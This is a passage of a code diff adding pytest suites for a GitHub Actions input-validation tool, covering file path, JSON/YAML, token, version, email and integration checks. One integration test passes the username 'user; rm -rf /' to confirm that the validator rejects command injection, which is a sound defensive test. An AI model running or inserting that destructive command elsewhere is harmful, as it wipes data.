for path in invalid_yaml_files:
self.validator.errors = []
result = self.validator.validate_yaml_file(path)
assert result is False, f"Should reject non-YAML file: {path}"
def test_validate_json_file(self):
"""Test JSON file validation."""
valid_json_files = [
"config.json",
"package.json",
"tsconfig.json",
"composer.json",
".eslintrc.json",
]
for path in valid_json_files:
self.validator.errors = []
result = self.validator.validate_json_file(path)
assert result is True, f"Should accept JSON file: {path}"
invalid_json_files = [
"config.js", # JavaScript, not JSON
"config.jsonc", # JSON with comments
"config.txt", # Wrong extension
]
for path in invalid_json_files:
self.validator.errors = []
result = self.validator.validate_json_file(path)
assert result is False, f"Should reject non-JSON file: {path}"
def test_validate_executable_file(self):
"""Test executable file validation."""
valid_executables = [
"script.sh",
"run.bash",
"deploy.py",
"build.js",
"test.rb",
"compile", # No extension but could be executable
"./script.sh",
"bin/deploy",
]
for path in valid_executables:
self.validator.errors = []
# This might check file extensions or actual file permissions
result = self.validator.validate_executable_file(path)
assert isinstance(result, bool)
def test_empty_path_handling(self):
"""Test that empty paths are handled correctly."""
result = self.validator.validate_file_path("")
# Empty path might be allowed for optional inputs
assert isinstance(result, bool)
# But for required file validations, empty should fail
self.validator.errors = []
result = self.validator.validate_required_file("")
assert result is False
assert len(self.validator.errors) > 0
def test_whitespace_paths(self):
"""Test that whitespace-only paths are treated as empty."""
whitespace_paths = [" ", " ", "\t", "\n"]
for path in whitespace_paths:
self.validator.errors = []
result = self.validator.validate_file_path(path)
# Should be treated as empty
assert isinstance(result, bool)
def test_validate_inputs_with_file_keywords(self):
"""Test validation of inputs with file-related keywords."""
inputs = {
"config-file": "config.yml",
"dockerfile": "Dockerfile",
"compose-file": "docker-compose.yml",
"env-file": ".env",
"output-file": "output.txt",
"input-file": "input.json",
"cache-dir": ".cache",
"working-directory": "./src",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_special_characters_in_paths(self):
"""Test handling of special characters in file paths."""
special_char_paths = [
"file name.txt", # Space
"file@v1.txt", # @ symbol
"file#1.txt", # Hash
"file$name.txt", # Dollar sign
"file&name.txt", # Ampersand
"file(1).txt", # Parentheses
"file[1].txt", # Brackets
]
for path in special_char_paths:
self.validator.errors = []
result = self.validator.validate_file_path(path)
# Some special characters might be allowed
assert isinstance(result, bool)

329
validate-inputs/tests/test_generate_tests.py Normal file
View File

@@ -0,0 +1,329 @@
"""Tests for the test generation system."""
# pylint: disable=protected-access # Testing private methods is intentional
import importlib.util
from pathlib import Path
import sys
import tempfile
import yaml # pylint: disable=import-error
# Import the test generator
scripts_path = Path(__file__).parent.parent / "scripts"
sys.path.insert(0, str(scripts_path))
spec = importlib.util.spec_from_file_location("generate_tests", scripts_path / "generate-tests.py")
if spec is None or spec.loader is None:
sys.exit("Failed to load generate-tests module")
generate_tests = importlib.util.module_from_spec(spec)
spec.loader.exec_module(generate_tests)
# Import as GeneratorClass to avoid pytest collection warning
GeneratorClass = generate_tests.TestGenerator
class TestTestGenerator:
"""Test cases for the test generation system."""
def setup_method(self): # pylint: disable=attribute-defined-outside-init
"""Set up test fixtures."""
self.temp_dir = Path(tempfile.mkdtemp())
self.generator = GeneratorClass(self.temp_dir)
def teardown_method(self):
"""Clean up test fixtures."""
import shutil # pylint: disable=import-outside-toplevel
if self.temp_dir.exists():
shutil.rmtree(self.temp_dir)
def test_generator_initialization(self):
"""Test that generator initializes correctly."""
assert self.generator.project_root == self.temp_dir
assert self.generator.validate_inputs_dir == self.temp_dir / "validate-inputs"
assert self.generator.tests_dir == self.temp_dir / "_tests"
assert self.generator.generated_count == 0
assert self.generator.skipped_count == 0
def test_skip_existing_shellspec_test(self):
"""Test that existing ShellSpec tests are not overwritten."""
# Create action directory with action.yml
action_dir = self.temp_dir / "test-action"
action_dir.mkdir(parents=True)
action_yml = action_dir / "action.yml"
action_yml.write_text(
yaml.dump(
{
"name": "Test Action",
"description": "Test action for testing",
"inputs": {"test-input": {"required": True}},
},
),
)
# Create existing test file
test_file = self.temp_dir / "_tests" / "unit" / "test-action" / "validation.spec.sh"
test_file.parent.mkdir(parents=True, exist_ok=True)
test_file.write_text("# Existing test")
# Run generator
self.generator.generate_action_tests()
# Verify test was not overwritten
assert test_file.read_text() == "# Existing test"
assert self.generator.skipped_count == 1
assert self.generator.generated_count == 0
def test_generate_new_shellspec_test(self):
"""Test generation of new ShellSpec test."""
# Create action directory with action.yml
action_dir = self.temp_dir / "test-action"
action_dir.mkdir(parents=True)
action_yml = action_dir / "action.yml"
action_yml.write_text(
yaml.dump(
{
"name": "Test Action",
"description": "Test action for testing",
"inputs": {
"token": {"required": True, "description": "GitHub token"},
"version": {"required": False, "default": "1.0.0"},
},
},
),
)
# Run generator
self.generator.generate_action_tests()
# Verify test was created
test_file = self.temp_dir / "_tests" / "unit" / "test-action" / "validation.spec.sh"
assert test_file.exists()
assert test_file.stat().st_mode & 0o111 # Check executable
content = test_file.read_text()
assert "Test Action Input Validation" in content
assert "should fail when required inputs are missing" in content
assert "should fail without token" in content
assert "should pass with all valid inputs" in content
assert self.generator.generated_count == 1
assert self.generator.skipped_count == 0
def test_skip_existing_pytest_test(self):
"""Test that existing pytest tests are not overwritten."""
# Create validators directory
validators_dir = self.temp_dir / "validate-inputs" / "validators"
validators_dir.mkdir(parents=True, exist_ok=True)
# Create validator file
validator_file = validators_dir / "test_validator.py"
validator_file.write_text("class TestValidator: pass")
# Create existing test file
test_file = self.temp_dir / "validate-inputs" / "tests" / "test_test_validator.py"
test_file.parent.mkdir(parents=True, exist_ok=True)
test_file.write_text("# Existing test")
# Run generator
self.generator.generate_validator_tests()
# Verify test was not overwritten
assert test_file.read_text() == "# Existing test"
assert self.generator.skipped_count == 1
def test_generate_new_pytest_test(self):
"""Test generation of new pytest test."""
# Create validators directory
validators_dir = self.temp_dir / "validate-inputs" / "validators"
validators_dir.mkdir(parents=True, exist_ok=True)
# Create validator file
validator_file = validators_dir / "example_validator.py"
validator_file.write_text("class ExampleValidator: pass")
# Ensure tests directory exists
tests_dir = self.temp_dir / "validate-inputs" / "tests"
tests_dir.mkdir(parents=True, exist_ok=True)
# Run generator
self.generator.generate_validator_tests()
# Verify test was created
test_file = tests_dir / "test_example_validator.py"
assert test_file.exists()
content = test_file.read_text()
assert "Tests for example_validator validator" in content
assert "from validators.example_validator import ExampleValidator" in content
assert "class TestExampleValidator:" in content
assert "def test_validate_inputs(self):" in content
def test_generate_custom_validator_test(self):
"""Test generation of custom validator test."""
# Create action with custom validator
action_dir = self.temp_dir / "docker-build"
action_dir.mkdir(parents=True)
custom_validator = action_dir / "CustomValidator.py"
custom_validator.write_text("class CustomValidator: pass")
# Ensure tests directory exists
tests_dir = self.temp_dir / "validate-inputs" / "tests"
tests_dir.mkdir(parents=True, exist_ok=True)
# Run generator
self.generator.generate_custom_validator_tests()
# Verify test was created
test_file = tests_dir / "test_docker-build_custom.py"
assert test_file.exists()
content = test_file.read_text()
assert "Tests for docker-build custom validator" in content
assert "from CustomValidator import CustomValidator" in content
assert "test_docker_specific_validation" in content # Docker-specific test
def test_get_example_value_patterns(self):
"""Test example value generation for different input patterns."""
# Token patterns
assert (
self.generator._get_example_value("github-token", {}) == "${{ secrets.GITHUB_TOKEN }}"
)
assert self.generator._get_example_value("npm-token", {}) == "${{ secrets.GITHUB_TOKEN }}"
# Version patterns
assert self.generator._get_example_value("version", {}) == "1.2.3"
assert self.generator._get_example_value("node-version", {}) == "1.2.3"
# Path patterns
assert self.generator._get_example_value("file-path", {}) == "./path/to/file"
assert self.generator._get_example_value("directory", {}) == "./path/to/file"
# URL patterns
assert self.generator._get_example_value("webhook-url", {}) == "https://example.com"
assert self.generator._get_example_value("endpoint", {}) == "https://example.com"
# Boolean patterns
assert self.generator._get_example_value("dry-run", {}) == "false"
assert self.generator._get_example_value("debug", {}) == "false"
assert self.generator._get_example_value("push", {}) == "true"
# Default from config
assert self.generator._get_example_value("anything", {"default": "custom"}) == "custom"
# Fallback
assert self.generator._get_example_value("unknown-input", {}) == "test-value"
def test_generate_input_test_cases(self):
"""Test generation of input-specific test cases."""
# Boolean input
cases = self.generator._generate_input_test_cases("dry-run", {})
assert len(cases) == 1
assert "should accept boolean values" in cases[0]
assert "should reject invalid boolean" in cases[0]
# Version input
cases = self.generator._generate_input_test_cases("version", {})
assert len(cases) == 1
assert "should accept valid version" in cases[0]
assert "should accept version with v prefix" in cases[0]
# Token input
cases = self.generator._generate_input_test_cases("github-token", {})
assert len(cases) == 1
assert "should accept GitHub token" in cases[0]
assert "should accept classic PAT" in cases[0]
# Path input
cases = self.generator._generate_input_test_cases("config-file", {})
assert len(cases) == 1
assert "should accept valid path" in cases[0]
assert "should reject path traversal" in cases[0]
# No specific pattern
cases = self.generator._generate_input_test_cases("custom-input", {})
assert len(cases) == 0
def test_generate_pytest_content_by_type(self):
"""Test that different validator types get appropriate test methods."""
# Version validator
content = self.generator._generate_pytest_content("version_validator")
assert "test_valid_semantic_version" in content
assert "test_valid_calver" in content
# Token validator
content = self.generator._generate_pytest_content("token_validator")
assert "test_valid_github_token" in content
assert "test_other_token_types" in content
# Boolean validator
content = self.generator._generate_pytest_content("boolean_validator")
assert "test_valid_boolean_values" in content
assert "test_invalid_boolean_values" in content
# Docker validator
content = self.generator._generate_pytest_content("docker_validator")
assert "test_valid_image_names" in content
assert "test_valid_platforms" in content
# Generic validator
content = self.generator._generate_pytest_content("unknown_validator")
assert "test_validate_inputs" in content
assert "TODO: Add specific test cases" in content
def test_skip_special_directories(self):
"""Test that special directories are skipped."""
# Create special directories that should be skipped
dot_dir = self.temp_dir / ".hidden"
dot_dir.mkdir()
(dot_dir / "action.yml").write_text("name: Hidden")
underscore_dir = self.temp_dir / "_internal"
underscore_dir.mkdir()
(underscore_dir / "action.yml").write_text("name: Internal")
validate_dir = self.temp_dir / "validate-inputs"
validate_dir.mkdir()
(validate_dir / "action.yml").write_text("name: Validate")
# Run generator
self.generator.generate_action_tests()
# Verify no tests were created for special directories
assert not (self.temp_dir / "_tests" / "unit" / ".hidden").exists()
assert not (self.temp_dir / "_tests" / "unit" / "_internal").exists()
assert not (self.temp_dir / "_tests" / "unit" / "validate-inputs").exists()
assert self.generator.generated_count == 0
def test_full_generation_workflow(self):
"""Test the complete generation workflow."""
# Setup test environment
self._setup_test_environment()
# Run full generation
self.generator.generate_all_tests()
# Verify counts
assert self.generator.generated_count > 0
assert self.generator.skipped_count >= 0
# Verify some files were created
shellspec_test = self.temp_dir / "_tests" / "unit" / "test-action" / "validation.spec.sh"
assert shellspec_test.exists()
def _setup_test_environment(self):
"""Set up a minimal test environment."""
# Create an action
action_dir = self.temp_dir / "test-action"
action_dir.mkdir(parents=True)
(action_dir / "action.yml").write_text(
yaml.dump({"name": "Test", "inputs": {"test": {"required": True}}}),
)
# Create validate-inputs structure
(self.temp_dir / "validate-inputs" / "validators").mkdir(parents=True, exist_ok=True)
(self.temp_dir / "validate-inputs" / "tests").mkdir(parents=True, exist_ok=True)

74
validate-inputs/tests/test_go-lint_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for go-lint custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "go-lint"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomGoLintValidator:
"""Test cases for go-lint custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("go-lint")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for go-lint
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for go-lint
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for go-lint
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for go-lint
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_go-version-detect_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for go-version-detect custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "go-version-detect"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomGoVersionDetectValidator:
"""Test cases for go-version-detect custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("go-version-detect")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for go-version-detect
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for go-version-detect
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for go-version-detect
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for go-version-detect
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

301
validate-inputs/tests/test_integration.py Normal file
View File

@@ -0,0 +1,301 @@
"""Integration tests for the validator script execution."""
import os
from pathlib import Path
import subprocess
import sys
import tempfile
import pytest # pylint: disable=import-error
class TestValidatorIntegration:
"""Integration tests for running validator.py as a script."""
def setup_method(self):
"""Set up test environment."""
# Clear INPUT_ environment variables
for key in list(os.environ.keys()):
if key.startswith("INPUT_"):
del os.environ[key]
# Create temporary output file
self.temp_output = tempfile.NamedTemporaryFile(mode="w", delete=False)
os.environ["GITHUB_OUTPUT"] = self.temp_output.name
self.temp_output.close()
# Get validator script path
self.validator_path = Path(__file__).parent.parent / "validator.py"
def teardown_method(self):
"""Clean up after each test."""
if Path(self.temp_output.name).exists():
os.unlink(self.temp_output.name)
def run_validator(self, env_vars=None):
"""Run the validator script with given environment variables."""
env = os.environ.copy()
if env_vars:
env.update(env_vars)
result = subprocess.run(
[sys.executable, str(self.validator_path)],
check=False,
env=env,
capture_output=True,
text=True,
)
return result
def test_validator_script_success(self):
"""Test validator script execution with valid inputs."""
env_vars = {
"INPUT_ACTION_TYPE": "github-release",
"INPUT_VERSION": "1.2.3",
"INPUT_CHANGELOG": "Release notes",
}
result = self.run_validator(env_vars)
assert result.returncode == 0
assert "All input validation checks passed" in result.stderr
def test_validator_script_failure(self):
"""Test validator script execution with invalid inputs."""
env_vars = {
"INPUT_ACTION_TYPE": "github-release",
"INPUT_VERSION": "invalid-version",
"INPUT_CHANGELOG": "Release notes",
}
result = self.run_validator(env_vars)
assert result.returncode == 1
assert "Input validation failed" in result.stderr
def test_validator_script_missing_required(self):
"""Test validator script with missing required inputs."""
env_vars = {
"INPUT_ACTION_TYPE": "github-release",
# Missing required INPUT_VERSION
"INPUT_CHANGELOG": "Release notes",
}
result = self.run_validator(env_vars)
assert result.returncode == 1
assert "Required input 'version' is missing" in result.stderr
def test_validator_script_calver_validation(self):
"""Test validator script with CalVer version."""
env_vars = {
"INPUT_ACTION_TYPE": "github-release",
"INPUT_VERSION": "2024.3.1",
"INPUT_CHANGELOG": "Release notes",
}
result = self.run_validator(env_vars)
assert result.returncode == 0
assert "All input validation checks passed" in result.stderr
def test_validator_script_invalid_calver(self):
"""Test validator script with invalid CalVer version."""
env_vars = {
"INPUT_ACTION_TYPE": "github-release",
"INPUT_VERSION": "2024.13.1", # Invalid month
"INPUT_CHANGELOG": "Release notes",
}
result = self.run_validator(env_vars)
assert result.returncode == 1
assert "Invalid CalVer format" in result.stderr
def test_validator_script_docker_build(self):
"""Test validator script with docker-build action."""
env_vars = {
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_CONTEXT": ".", # Required by custom validator
"INPUT_IMAGE_NAME": "myapp",
"INPUT_TAG": "v1.0.0",
"INPUT_DOCKERFILE": "Dockerfile",
"INPUT_ARCHITECTURES": "linux/amd64,linux/arm64",
}
result = self.run_validator(env_vars)
assert result.returncode == 0
assert "All input validation checks passed" in result.stderr
def test_validator_script_csharp_publish(self):
"""Test validator script with csharp-publish action."""
env_vars = {
"INPUT_ACTION_TYPE": "csharp-publish",
"INPUT_TOKEN": "github_pat_" + "a" * 71,
"INPUT_NAMESPACE": "test-namespace",
"INPUT_DOTNET_VERSION": "8.0.0",
}
result = self.run_validator(env_vars)
assert result.returncode == 0
assert "All input validation checks passed" in result.stderr
def test_validator_script_invalid_token(self):
"""Test validator script with invalid GitHub token."""
env_vars = {
"INPUT_ACTION_TYPE": "csharp-publish",
"INPUT_TOKEN": "invalid-token",
"INPUT_NAMESPACE": "test-namespace",
}
result = self.run_validator(env_vars)
assert result.returncode == 1
assert "token format" in result.stderr.lower()
def test_validator_script_security_injection(self):
"""Test validator script detects security injection attempts."""
env_vars = {
"INPUT_ACTION_TYPE": "eslint-fix",
"INPUT_TOKEN": "github_pat_" + "a" * 82,
"INPUT_USERNAME": "user; rm -rf /", # Command injection attempt
}
result = self.run_validator(env_vars)
assert result.returncode == 1
assert "Command injection patterns not allowed" in result.stderr
def test_validator_script_numeric_range(self):
"""Test validator script with numeric range validation."""
env_vars = {
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_CONTEXT": ".", # Required by custom validator
"INPUT_IMAGE_NAME": "myapp",
"INPUT_TAG": "latest",
"INPUT_PARALLEL_BUILDS": "5", # Should be valid (0-16 range)
}
result = self.run_validator(env_vars)
assert result.returncode == 0
def test_validator_script_numeric_range_invalid(self):
"""Test validator script with invalid numeric range."""
env_vars = {
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_IMAGE_NAME": "myapp",
"INPUT_TAG": "latest",
"INPUT_PARALLEL_BUILDS": "20", # Should be invalid (exceeds 16)
}
result = self.run_validator(env_vars)
assert result.returncode == 1
def test_validator_script_boolean_validation(self):
"""Test validator script with boolean validation."""
env_vars = {
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_CONTEXT": ".", # Required by custom validator
"INPUT_IMAGE_NAME": "myapp",
"INPUT_TAG": "latest",
"INPUT_DRY_RUN": "true",
}
result = self.run_validator(env_vars)
assert result.returncode == 0
def test_validator_script_boolean_invalid(self):
"""Test validator script with invalid boolean."""
env_vars = {
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_IMAGE_NAME": "myapp",
"INPUT_TAG": "latest",
"INPUT_DRY_RUN": "maybe", # Invalid boolean
}
result = self.run_validator(env_vars)
assert result.returncode == 1
def test_validator_script_no_action_type(self):
"""Test validator script without action type."""
env_vars = {
# No INPUT_ACTION_TYPE
"INPUT_VERSION": "1.2.3",
}
result = self.run_validator(env_vars)
# Should still run but with empty action type
assert result.returncode in [0, 1] # Depends on validation logic
def test_validator_script_output_file_creation(self):
"""Test that validator script creates GitHub output file."""
env_vars = {
"INPUT_ACTION_TYPE": "github-release",
"INPUT_VERSION": "1.2.3",
}
result = self.run_validator(env_vars)
# Check that validator ran successfully
assert result.returncode == 0
# Check that output file was written to
assert Path(self.temp_output.name).exists()
with Path(self.temp_output.name).open() as f:
content = f.read()
assert "status=" in content
def test_validator_script_error_handling(self):
"""Test validator script handles exceptions gracefully."""
# Test with invalid GITHUB_OUTPUT path to trigger exception
env_vars = {
"INPUT_ACTION_TYPE": "github-release",
"INPUT_VERSION": "1.2.3",
"GITHUB_OUTPUT": "/invalid/path/that/does/not/exist",
}
result = self.run_validator(env_vars)
assert result.returncode == 1
assert "Validation script error" in result.stderr
@pytest.mark.parametrize(
"action_type,inputs,expected_success",
[
("github-release", {"version": "1.2.3"}, True),
("github-release", {"version": "2024.3.1"}, True),
("github-release", {"version": "invalid"}, False),
("docker-build", {"context": ".", "image-name": "app", "tag": "latest"}, True),
(
"docker-build",
{"context": ".", "image-name": "App", "tag": "latest"},
False,
), # Uppercase not allowed
("csharp-publish", {"token": "github_pat_" + "a" * 71, "namespace": "test"}, True),
("csharp-publish", {"token": "invalid", "namespace": "test"}, False),
],
)
def test_validator_script_parametrized(self, action_type, inputs, expected_success):
"""Parametrized test for various action types and inputs."""
env_vars = {"INPUT_ACTION_TYPE": action_type}
# Convert inputs to environment variables
for key, value in inputs.items():
env_key = f"INPUT_{key.upper().replace('-', '_')}"
env_vars[env_key] = value
result = self.run_validator(env_vars)
if expected_success:
assert result.returncode == 0, f"Expected success for {action_type} with {inputs}"
else:
assert result.returncode == 1, f"Expected failure for {action_type} with {inputs}"

279
validate-inputs/tests/test_modular_validator.py Normal file
View File

@@ -0,0 +1,279 @@
"""Tests for modular_validator.py main entry point."""
from __future__ import annotations
import os
from pathlib import Path
import sys
from unittest.mock import MagicMock, patch
import pytest # pylint: disable=import-error
# Add validate-inputs directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
# pylint: disable=wrong-import-position
from modular_validator import main
class TestModularValidator:
"""Test cases for modular_validator main function."""
def test_missing_action_type(self, tmp_path):
"""Test that missing action-type causes failure."""
output_file = tmp_path / "github_output"
output_file.touch()
with (
patch.dict(
os.environ,
{"GITHUB_OUTPUT": str(output_file)},
clear=True,
),
pytest.raises(SystemExit) as exc_info,
):
main()
assert exc_info.value.code == 1
content = output_file.read_text()
assert "status=failure" in content
assert "error=action-type is required" in content
def test_valid_action_type_success(self, tmp_path):
"""Test successful validation with valid action-type."""
output_file = tmp_path / "github_output"
output_file.touch()
# docker-build is a known action with a validator
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_TAG": "v1.0.0",
"INPUT_IMAGE_NAME": "myapp",
},
clear=True,
),
patch("modular_validator.logger") as mock_logger,
):
main()
content = output_file.read_text()
assert "status=success" in content
mock_logger.info.assert_called()
def test_valid_action_type_validation_failure(self, tmp_path):
"""Test validation failure with invalid inputs."""
output_file = tmp_path / "github_output"
output_file.touch()
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_TAG": "invalid_tag!", # Invalid tag format
},
clear=True,
),
patch("modular_validator.logger") as mock_logger,
pytest.raises(SystemExit) as exc_info,
):
main()
assert exc_info.value.code == 1
content = output_file.read_text()
assert "status=failure" in content
assert "error=" in content
mock_logger.error.assert_called()
def test_environment_variable_extraction(self, tmp_path):
"""Test that INPUT_* environment variables are extracted correctly."""
output_file = tmp_path / "github_output"
output_file.touch()
mock_validator = MagicMock()
mock_validator.validate_inputs.return_value = True
mock_validator.errors = []
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_TAG": "v1.0.0",
"INPUT_IMAGE_NAME": "myapp",
"INPUT_BUILD_ARGS": "NODE_ENV=prod",
"NOT_AN_INPUT": "should_be_ignored",
},
clear=True,
),
patch("modular_validator.get_validator", return_value=mock_validator),
):
main()
# Check that validate_inputs was called with correct inputs
call_args = mock_validator.validate_inputs.call_args[0][0]
assert "tag" in call_args
assert call_args["tag"] == "v1.0.0"
assert "image_name" in call_args or "image-name" in call_args
assert "build_args" in call_args or "build-args" in call_args
assert "not_an_input" not in call_args
def test_underscore_to_dash_conversion(self, tmp_path):
"""Test that underscore names are converted to dash names."""
output_file = tmp_path / "github_output"
output_file.touch()
mock_validator = MagicMock()
mock_validator.validate_inputs.return_value = True
mock_validator.errors = []
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": "docker-build",
"INPUT_BUILD_ARGS": "test=value",
},
clear=True,
),
patch("modular_validator.get_validator", return_value=mock_validator),
):
main()
# Check that both underscore and dash versions are present
call_args = mock_validator.validate_inputs.call_args[0][0]
assert "build_args" in call_args or "build-args" in call_args
def test_action_type_dash_to_underscore(self, tmp_path):
"""Test that action-type with dashes is converted to underscores."""
output_file = tmp_path / "github_output"
output_file.touch()
mock_validator = MagicMock()
mock_validator.validate_inputs.return_value = True
mock_validator.errors = []
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": "docker-build",
},
clear=True,
),
patch("modular_validator.get_validator", return_value=mock_validator) as mock_get,
):
main()
# get_validator should be called with underscore version
mock_get.assert_called_once_with("docker_build")
def test_exception_handling(self, tmp_path):
"""Test exception handling writes failure to output."""
output_file = tmp_path / "github_output"
output_file.touch()
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": "docker-build",
},
clear=True,
),
patch("modular_validator.get_validator", side_effect=ValueError("Test error")),
pytest.raises(SystemExit) as exc_info,
):
main()
assert exc_info.value.code == 1
content = output_file.read_text()
assert "status=failure" in content
assert "error=Validation script error" in content
def test_exception_handling_no_github_output(self):
"""Test exception handling when GITHUB_OUTPUT not set."""
# Create a fallback path in home directory
fallback_path = Path.home() / "github_output"
try:
with (
patch.dict(os.environ, {"INPUT_ACTION_TYPE": "docker-build"}, clear=True),
patch("modular_validator.get_validator", side_effect=ValueError("Test error")),
patch("modular_validator.logger"),
pytest.raises(SystemExit) as exc_info,
):
main()
assert exc_info.value.code == 1
# Check that fallback file was created
if fallback_path.exists():
content = fallback_path.read_text()
assert "status=failure" in content
assert "error=Validation script error" in content
finally:
# Cleanup fallback file if it exists
if fallback_path.exists():
fallback_path.unlink()
def test_validation_errors_written_to_output(self, tmp_path):
"""Test that validation errors are written to GITHUB_OUTPUT."""
output_file = tmp_path / "github_output"
output_file.touch()
mock_validator = MagicMock()
mock_validator.validate_inputs.return_value = False
mock_validator.errors = ["Error 1", "Error 2"]
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": "docker-build",
},
clear=True,
),
patch("modular_validator.get_validator", return_value=mock_validator),
pytest.raises(SystemExit) as exc_info,
):
main()
assert exc_info.value.code == 1
content = output_file.read_text()
assert "status=failure" in content
assert "Error 1" in content
assert "Error 2" in content
def test_empty_action_type_string(self, tmp_path):
"""Test that empty action-type string is treated as missing."""
output_file = tmp_path / "github_output"
output_file.touch()
with (
patch.dict(
os.environ,
{
"GITHUB_OUTPUT": str(output_file),
"INPUT_ACTION_TYPE": " ", # Whitespace only
},
clear=True,
),
pytest.raises(SystemExit) as exc_info,
):
main()
assert exc_info.value.code == 1
content = output_file.read_text()
assert "status=failure" in content
assert "action-type is required" in content

360
validate-inputs/tests/test_network.py Normal file
View File

@@ -0,0 +1,360 @@
"""Tests for network validator."""
from validators.network import NetworkValidator
class TestNetworkValidator:
"""Test cases for NetworkValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = NetworkValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.action_type == "test-action"
assert len(self.validator.errors) == 0
def test_get_required_inputs(self):
"""Test get_required_inputs returns empty list."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
assert len(required) == 0
def test_get_validation_rules(self):
"""Test get_validation_rules returns dict."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
assert "email" in rules
assert "url" in rules
assert "scope" in rules
assert "username" in rules
# Email validation tests
def test_valid_emails(self):
"""Test valid email addresses."""
assert self.validator.validate_email("user@example.com") is True
assert self.validator.validate_email("test.user+tag@company.co.uk") is True
assert self.validator.validate_email("123@example.com") is True
assert self.validator.validate_email("user_name@domain.org") is True
def test_invalid_emails(self):
"""Test invalid email addresses."""
self.validator.clear_errors()
assert self.validator.validate_email("invalid") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_email("@example.com") is False
assert "Missing local part" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_email("user@") is False
assert "Missing domain" in " ".join(self.validator.errors)
def test_email_empty_optional(self):
"""Test email allows empty (optional)."""
assert self.validator.validate_email("") is True
assert self.validator.validate_email(" ") is True
def test_email_with_spaces(self):
"""Test email rejects spaces."""
self.validator.clear_errors()
assert self.validator.validate_email("user name@example.com") is False
assert "Spaces not allowed" in " ".join(self.validator.errors)
def test_email_multiple_at_symbols(self):
"""Test email rejects multiple @ symbols."""
self.validator.clear_errors()
assert self.validator.validate_email("user@@example.com") is False
assert "@" in " ".join(self.validator.errors)
def test_email_consecutive_dots(self):
